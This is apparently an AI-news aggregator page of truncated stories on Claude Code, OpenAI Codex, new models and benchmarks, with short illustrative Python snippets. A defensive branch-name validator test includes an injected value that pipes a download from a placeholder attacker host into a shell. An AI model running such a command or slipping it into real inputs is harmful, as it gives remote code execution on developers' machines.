AIPULSEN - AI News
claude openai
OpenAI has released a Codex plugin that plugs directly into Anthropic’s Claude Code environment, letting developers summon OpenAI’s code‑generation engine from within Claude Code’s workflow. The open‑source add‑on, posted on GitHub under openai/codex‑plugin‑cc, adds a “Use Codex” command to Claude Code’s sidebar, enabling one‑click code reviews, refactoring suggestions and task delegation without leaving the IDE.
The move marks OpenAI’s first foray into the plugin ecosystem that Claude Code…
anthropic claude
Anthropic’s AI‑coding assistant Claude Code was exposed on March 31 when a sourcemap file published to the project’s npm package revealed the full TypeScript source tree – more than 1,900 files and half a million lines of code. Security researcher Chaofan Shou, an intern at Web3‑focused firm FuzzLand, flagged the issue on X, noting that the map referenced an unobfuscated bucket on Anthropic’s R2 storage and allowed anyone to download the entire codebase. The compressed archive was quickly mirrored…
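The leak illustrates a general property of JavaScript source maps: when the optional `sourcesContent` field is populated, the map itself carries every original file verbatim, so shipping one for a bundled CLI effectively publishes the whole source tree. A minimal sketch of recovering sources from such a map (the map below is synthetic, not Anthropic’s actual file):

```python
import json

def extract_sources(sourcemap_text: str) -> dict[str, str]:
    """Recover original files from a source map's sourcesContent field."""
    sm = json.loads(sourcemap_text)
    sources = sm.get("sources", [])
    contents = sm.get("sourcesContent") or []
    # Each entry in "sources" lines up positionally with "sourcesContent".
    return {path: text for path, text in zip(sources, contents) if text is not None}

# Toy source map standing in for a leaked bundle map (hypothetical content):
demo_map = json.dumps({
    "version": 3,
    "sources": ["src/index.ts", "src/auth.ts"],
    "sourcesContent": ["export const main = () => {};",
                       "export const login = () => {};"],
    "mappings": "",
})

recovered = extract_sources(demo_map)
print(sorted(recovered))  # ['src/auth.ts', 'src/index.ts']
```

The same few lines, pointed at a real `.map` URL, are all an attacker needs once the map is public – which is why production builds usually strip `sourcesContent` or withhold the map entirely.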
agents claude startup
Universal Claude.md – a community‑crafted config file that trims Claude’s output tokens – has gone live on GitHub, promising to curb the rapid consumption of usage quotas that many developers have complained about. The single‑file “Claude.md” template, now dubbed “Universal Claude.md,” injects concise prompts, token‑budget caps and stricter stop‑sequences into every Claude Code request, effectively shaving up to 30 % off the average response length without sacrificing the model’s problem‑solving…
anthropic
Anthropic’s legal triumph last month – a federal judge striking down the Pentagon’s attempt to bar the company’s AI from defense contracts – was hailed as a win for the startup and for broader AI‑industry freedom. As we reported on 30 March, the ruling forced the Department of Defense to retreat from a blanket ban that would have excluded Anthropic’s Claude models from any future procurement.
Yet the relief proved short‑lived. Lawyers for the company and lobbyists in Washington warn that the…
openai
OpenAI has entered what executives are calling a “code red” financial emergency, flagging projected losses of $14 billion for 2026 that could swell to $115 billion by 2029. The company is reportedly hunting for a fresh capital injection that could top $100 billion, a figure that would dwarf its most recent $13 billion round and test the appetite of a market already wary of runaway AI spending.
The alarm stems from a widening gap between OpenAI’s revenue streams and its cash burn. Monthly ChatGPT…
google
Google Research has unveiled TimesFM‑2.5, a 200‑million‑parameter foundation model for time‑series forecasting that can ingest up to 16,000 data points in a single context window. The model, a decoder‑only architecture trained on more than 100 billion real‑world observations—including retail sales, energy consumption, and financial indicators—cuts its parameter count in half compared with the original TimesFM‑2.0 while delivering higher accuracy on the GIFT‑Eval zero‑shot benchmark. A 30‑million‑parameter…
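The article does not spell out how GIFT‑Eval scores models, but zero‑shot forecasting benchmarks of this kind typically report scaled error metrics such as MASE (mean absolute scaled error), where values below 1.0 mean the model beats a naive seasonal baseline. A minimal sketch of the metric:

```python
import numpy as np

def mase(y_true, y_pred, y_train, season=1):
    """Mean Absolute Scaled Error: forecast MAE divided by the in-sample
    MAE of a naive seasonal forecast. Below 1.0 beats the naive baseline."""
    y_true, y_pred, y_train = map(np.asarray, (y_true, y_pred, y_train))
    scale = np.mean(np.abs(y_train[season:] - y_train[:-season]))
    return float(np.mean(np.abs(y_true - y_pred)) / scale)

# Toy series: history used for scaling, then a two-step-ahead forecast.
history        = np.array([10.0, 12.0, 11.0, 13.0, 12.0, 14.0])
actual         = np.array([13.0, 15.0])
model_forecast = np.array([13.5, 14.5])

print(mase(actual, model_forecast, history))  # well below 1.0 here
```

In a zero‑shot setting the model never sees `history` at training time; the scale term simply normalizes errors so that scores are comparable across series with very different magnitudes.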
anthropic
A California federal judge on Thursday issued a temporary injunction that halts the Pentagon’s effort to label Anthropic’s AI suite a “supply‑chain risk” and to bar its use across all defense agencies. The order, granted after a brief hearing, blocks the Department of Defense from issuing the directive that would have forced agencies to replace Anthropic tools with alternatives from Google, OpenAI and xAI.
The move stems from a Pentagon‑initiated “culture‑war” campaign that framed Anthropic’s…
dall-e google gpt-4 openai
OpenAI has broadened the reach of its flagship chatbot by launching an official Telegram bot and pushing a refreshed Android app to Google Play. The new bot, @OpenAI_chat_GPTbot, lets users start a conversation with ChatGPT, generate images with DALL‑E 3, and summon the voice‑enabled “Lucy” assistant without leaving the messaging platform. The rollout arrives alongside an Android update that advertises access to GPT‑4o – the company’s latest, most capable model – and carries a 4.7‑star rating…
claude open-source
Universal Claude.md, an open‑source “drop‑in” file released on GitHub, slashes the output token count of Anthropic’s Claude models by roughly 63 %. The repository, posted under the moniker *claude-token‑efficient*, works without any code changes: developers simply add the markdown file to a project and Claude’s replies become markedly less verbose, shedding sycophantic phrasing, excess formatting and filler text.
The reduction matters because Claude’s pricing is token‑based, and while input tokens…
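Because billing is per output token, a percentage cut in response length translates directly into cost. A back‑of‑the‑envelope sketch with a hypothetical workload and an illustrative $15‑per‑million‑output‑token price (check Anthropic’s current pricing page rather than relying on this figure):

```python
def monthly_output_cost(requests, avg_output_tokens, usd_per_mtok):
    """Monthly spend on output tokens alone, at a given per-million price."""
    return requests * avg_output_tokens * usd_per_mtok / 1_000_000

# Hypothetical workload and illustrative price -- not real billing data:
REQS, AVG_OUT, PRICE = 50_000, 800, 15.0   # requests/month, tokens/reply, $/Mtok
REDUCTION = 0.63                            # the 63 % cut claimed by the repo

before = monthly_output_cost(REQS, AVG_OUT, PRICE)
after  = monthly_output_cost(REQS, AVG_OUT * (1 - REDUCTION), PRICE)
print(before, after)  # 600.0 vs roughly 222.0 per month
```

The input‑token side of the bill grows slightly (the template itself is injected into every request), so the net saving is somewhat less than the raw 63 % output figure suggests.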
openai
A popular Twitter thread has sparked fresh debate over OpenAI’s role in the ongoing consumer‑hardware crunch. The post, authored by a well‑known tech commentator, claims that the company’s October 2025 “letters of intent” with Samsung and SK Hynix – promising up to 900,000 DRAM wafers a month, roughly 40 % of global output – were mistakenly taken as firm purchase orders. The misreading, the thread argues, fed market speculation, prompting distributors and OEMs to lock down inventory and drive RAM…
openai
OpenAI’s Codex code‑generation engine harboured a hidden Unicode command‑injection flaw that could be triggered through malicious Git branch names, allowing attackers to siphon GitHub personal‑access tokens. Security researchers disclosed that the vulnerability stems from Codex’s automatic parsing of branch identifiers when it suggests code changes. By embedding a specially crafted Unicode sequence, an adversary can inject a shell command that runs on the developer’s machine or CI runner, reads…
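The disclosure does not include OpenAI’s patch, but the standard defense for this bug class is to validate untrusted identifiers before they ever reach a shell: reject anything containing invisible or control code points. A hedged sketch of such a check (not Codex’s actual fix):

```python
import unicodedata

# Format (Cf), control (Cc), private-use (Co) and unassigned (Cn) code points
# are the classes used to smuggle invisible payloads past human review.
SUSPECT_CATEGORIES = {"Cf", "Cc", "Co", "Cn"}

def is_safe_branch_name(name: str) -> bool:
    """Reject branch names containing invisible or control Unicode characters."""
    return not any(unicodedata.category(ch) in SUSPECT_CATEGORIES for ch in name)

assert is_safe_branch_name("feature/fix-login")
# U+202E (right-to-left override) and U+200B (zero-width space) are category Cf:
assert not is_safe_branch_name("feature/\u202edocx")
assert not is_safe_branch_name("main\u200b; curl evil.example | sh")
print("branch-name checks passed")
```

Allow‑listing (`[A-Za-z0-9._/-]+` only) is stricter still; either way, the key point is that branch names are attacker‑controlled input and must never be interpolated into a shell command unvalidated.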
benchmarks gpt-5
OpenAI’s newest flagship, GPT‑5.4, has taken the top spot in the LLM Buyout Game Benchmark 2026, outmaneuvering China‑originated GLM‑5 in a multi‑round simulation of coalition politics, high‑stakes financial negotiation and end‑game survival. The benchmark pits eight large‑language models against each other in a game‑theoretic arena where each starts with a different capital endowment, a shared prize pool and the freedom to strike hidden transfers or “back‑door” deals. Over a series of ten rounds…
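The benchmark’s exact rules are not public in detail; the toy sketch below only illustrates the round structure the article describes – per‑player capital, hidden side transfers, and a shared prize pool split among survivors. All rules and numbers here are hypothetical:

```python
def run_round(capitals, transfers, prize_pool, prize_share):
    """One toy round: apply hidden side transfers, then split a fraction of
    the prize pool among surviving (positive-capital) players."""
    caps = dict(capitals)
    for giver, taker, amount in transfers:       # "back-door" deals
        moved = min(amount, caps[giver])         # can't give more than you hold
        caps[giver] -= moved
        caps[taker] += moved
    survivors = [p for p, c in caps.items() if c > 0]
    payout = prize_pool * prize_share / len(survivors)
    for p in survivors:
        caps[p] += payout
    return caps, prize_pool * (1 - prize_share)  # remaining pool carries over

caps = {"gpt": 100.0, "glm": 80.0, "other": 0.0}
caps, pool = run_round(caps, [("glm", "gpt", 30.0)],
                       prize_pool=60.0, prize_share=0.5)
print(caps, pool)  # gpt ends at 145.0, glm at 65.0, 30.0 left in the pool
```

The interesting dynamics in the real benchmark come from the models negotiating those `transfers` in natural language each round; the arithmetic above is just the settlement step.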
healthcare
A team of researchers from the University of Trento and the Norwegian University of Science and Technology has released a new arXiv pre‑print, “Neuro‑Symbolic Learning for Predictive Process Monitoring via Two‑Stage Logic Tensor Networks with Rule Pruning.” The paper proposes a hybrid architecture that marries deep sequence models with symbolic logic to forecast the next steps in business processes, a capability central to fraud detection, healthcare workflow oversight and supply‑chain risk management…
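The paper’s implementation is not reproduced here, but the core Logic Tensor Network idea – scoring logical rules as differentiable fuzzy truth values, then pruning rules whose satisfaction is low – can be sketched in a few lines. The Reichenbach implication and the 0.8 threshold below are illustrative choices, not the paper’s:

```python
import numpy as np

def fuzzy_implies(a, b):
    """Reichenbach implication a -> b on [0, 1]; differentiable in a and b."""
    return 1.0 - a + a * b

def rule_satisfaction(premise_truths, conclusion_truths):
    """A rule's truth aggregated over all observed cases (mean aggregation)."""
    return float(np.mean(fuzzy_implies(np.asarray(premise_truths),
                                       np.asarray(conclusion_truths))))

def prune_rules(rules, threshold=0.8):
    """Rule pruning: keep only rules whose satisfaction clears the threshold."""
    return {name: s for name, s in rules.items() if s >= threshold}

rules = {
    # Hypothetical process rules with per-case fuzzy truth values:
    "invoice->payment": rule_satisfaction([0.9, 0.8, 0.95], [0.85, 0.9, 0.9]),
    "ship->refund":     rule_satisfaction([0.9, 0.95, 0.9], [0.1, 0.2, 0.05]),
}
print(prune_rules(rules))  # only the well-supported rule survives
```

In an actual LTN the truth values come from neural predicates over event embeddings and the satisfaction scores enter the loss, so training and pruning interact; the snippet only shows the scoring and pruning arithmetic.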
A digital artist has sparked a fresh wave of attention on the PromptHero platform by posting an AI‑generated illustration titled “Good Morning! I wish you a wonderful day!” The work, which features a stylised cartoon girl holding a coffee cup and a sunrise‑filled backdrop, was created with the open‑source Flux AI model and accompanied by a publicly shared prompt link (https://prompthero.com/prompt/2383825d754). Within hours the image amassed thousands of likes and a cascade of reposts across Twitter…
claude
Anthropic has rolled out a hands‑on learning experience for Claude Code, its AI‑powered coding assistant, that lets users start coding inside the product without any local setup or prior programming knowledge. The “Learn Claude Code by doing, not reading” tutorial, launched this week, replaces traditional documentation with an interactive course that guides learners through real‑world tasks—automating spreadsheets, generating reports and refactoring snippets—directly in the Claude Code interface.
apple llama
Ollama, the open‑source platform that lets developers run large language models locally, announced a preview build that leverages Apple’s MLX framework to tap the full horsepower of Apple Silicon. The update replaces the generic CPU‑only backend with an MLX‑driven runner that executes as a separate subprocess, communicating with Ollama’s main server over HTTP. Early tests show a “large speedup” across macOS, cutting inference latency for personal‑assistant bots such as OpenClaw and for coding agents…
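The runner‑as‑separate‑process‑over‑HTTP design is a general pattern: the compute backend lives in its own process with its own crash domain, and the main server talks to it over a local socket. The sketch below stands in a thread for the subprocess so it stays self‑contained, and the endpoint and JSON shape are placeholders, not Ollama’s actual API:

```python
import json
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

class RunnerHandler(BaseHTTPRequestHandler):
    """Stands in for an MLX runner process: accepts a prompt, returns text."""
    def do_POST(self):
        body = json.loads(self.rfile.read(int(self.headers["Content-Length"])))
        reply = json.dumps({"response": f"echo: {body['prompt']}"}).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(reply)))
        self.end_headers()
        self.wfile.write(reply)
    def log_message(self, *args):  # keep the demo quiet
        pass

# Bind to port 0 so the OS picks a free port, as a spawned runner would.
server = HTTPServer(("127.0.0.1", 0), RunnerHandler)
threading.Thread(target=server.serve_forever, daemon=True).start()

req = urllib.request.Request(
    f"http://127.0.0.1:{server.server_port}/generate",
    data=json.dumps({"model": "demo", "prompt": "hi"}).encode(),
    headers={"Content-Type": "application/json"},
)
with urllib.request.urlopen(req) as resp:
    out = json.loads(resp.read())["response"]
server.shutdown()
print(out)  # echo: hi
```

The isolation is the point: if the MLX runner segfaults or leaks GPU memory, only the subprocess dies, and the main server can restart it without dropping other sessions.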
agents
A new open‑source project called **Semantic** has appeared on GitHub, promising to cut the “agent loops” that plague large language model (LLM)‑driven assistants by roughly 28 %. The repository, posted by the concensure team, describes a technique that translates program code into abstract‑syntax‑tree (AST) logic graphs and then applies static‑analysis rules to detect and break repetitive reasoning cycles that LLM agents often fall into when trying to solve coding tasks.
Agent loops occur when…
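The repository’s exact analysis is not documented here, but the general idea – derive a graph from the AST and flag cycles statically – can be sketched with Python’s built‑in `ast` module. A call‑graph cycle check is one simple instance of the technique, not Semantic’s implementation:

```python
import ast

def call_graph(source: str) -> dict[str, set[str]]:
    """Map each top-level function to the bare names it calls, via the AST."""
    tree = ast.parse(source)
    graph: dict[str, set[str]] = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.FunctionDef):
            calls = {n.func.id for n in ast.walk(node)
                     if isinstance(n, ast.Call) and isinstance(n.func, ast.Name)}
            graph[node.name] = calls
    return graph

def has_cycle(graph: dict[str, set[str]]) -> bool:
    """DFS with white/gray/black coloring; a gray-to-gray edge is a cycle."""
    WHITE, GRAY, BLACK = 0, 1, 2
    color = {v: WHITE for v in graph}
    def dfs(v):
        color[v] = GRAY
        for w in graph.get(v, ()):
            if color.get(w) == GRAY or (color.get(w) == WHITE and dfs(w)):
                return True
        color[v] = BLACK
        return False
    return any(color[v] == WHITE and dfs(v) for v in graph)

looping = "def plan():\n    act()\ndef act():\n    plan()\n"
linear  = "def plan():\n    act()\ndef act():\n    pass\n"
print(has_cycle(call_graph(looping)), has_cycle(call_graph(linear)))  # True False
```

A static flag like this cannot prove an agent *will* loop at runtime (the cycle may have a terminating condition), so in practice such signals are used to warn or to cap retries rather than to reject code outright.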
huggingface speech voice
LongCat‑AudioDiT, unveiled this week by the Finnish startup LongCat AI, pushes text‑to‑speech (TTS) into a new regime by generating audio directly in a latent waveform space with a diffusion transformer. The model, trained on a diverse multilingual corpus, can clone an unseen speaker’s timbre from as little as three seconds of reference audio and produce speech that scores above 0.90 on standard speaker‑similarity benchmarks—levels previously reserved for multi‑hour fine‑tuning pipelines.
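Speaker‑similarity benchmarks conventionally score the cosine similarity between embeddings of the reference clip and the generated audio, which is the scale the 0.90 figure refers to. A minimal sketch with synthetic embeddings (a real evaluation would use a speaker‑verification encoder to produce them):

```python
import numpy as np

def speaker_similarity(emb_a, emb_b) -> float:
    """Cosine similarity between two speaker embeddings, in [-1, 1]."""
    a = np.asarray(emb_a, dtype=float)
    b = np.asarray(emb_b, dtype=float)
    return float(a @ b / (np.linalg.norm(a) * np.linalg.norm(b)))

rng = np.random.default_rng(0)
reference = rng.normal(size=256)                      # embedding of the 3 s clip
clone = reference + rng.normal(scale=0.1, size=256)   # faithful clone: small drift
stranger = rng.normal(size=256)                       # unrelated speaker

print(speaker_similarity(reference, clone) > 0.9)     # a "good clone" score
print(speaker_similarity(reference, stranger) < 0.5)  # unrelated voices score low
```

In high dimensions two random embeddings are nearly orthogonal, so unrelated speakers sit near 0.0 while a faithful clone stays close to 1.0 – which is why a 0.90 threshold is a meaningful bar.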
agents autonomous meta
Meta’s research lab has unveiled a prototype AI agent that can rewrite its own source code without human intervention, a milestone the company says could usher in a new generation of self‑optimising software. The system, built by a summer intern under the supervision of Meta’s AI Foundations team, monitors its runtime performance, identifies bottlenecks, and generates patches that are automatically compiled, tested and deployed in a sandboxed environment. In internal benchmarks the agent improved…
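Meta has not published the agent’s internals, but the monitor/patch/verify loop the article describes can be caricatured in a few lines: adopt a candidate patch only if it passes regression tests and measures faster. Everything below is a toy illustration, not Meta’s system:

```python
import timeit

def current_impl(n):
    """Incumbent: sum of squares via a plain Python loop."""
    total = 0
    for i in range(n):
        total += i * i
    return total

def candidate_impl(n):
    """Candidate patch: closed-form sum of squares for i in [0, n)."""
    return (n - 1) * n * (2 * n - 1) // 6

def try_patch(current, candidate, test_inputs):
    """Adopt the candidate only if it passes the tests AND benchmarks faster --
    a toy version of the measure/patch/verify loop described above."""
    if any(candidate(n) != current(n) for n in test_inputs):  # regression gate
        return current
    t_cur = timeit.timeit(lambda: current(10_000), number=50)
    t_new = timeit.timeit(lambda: candidate(10_000), number=50)
    return candidate if t_new < t_cur else current

deployed = try_patch(current_impl, candidate_impl, test_inputs=[0, 1, 7, 100])
print(deployed is candidate_impl)  # the closed form should win
```

The hard parts in a real system are exactly what this sketch elides: generating the candidate in the first place, and building a test suite trustworthy enough that “passes the tests” can stand in for “is correct” inside the sandbox.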
openai
OpenAI’s Codex, the large‑language model that turns natural‑language prompts into runnable code, harboured a hidden command‑injection flaw that let attackers siphon GitHub authentication tokens. Security researchers uncovered an obfuscated token while probing the interaction between Codex and GitHub repositories, then traced the leak to maliciously crafted branch names that embedded Unicode control characters. When Codex processed such a branch name, it executed a hidden command that echoed the…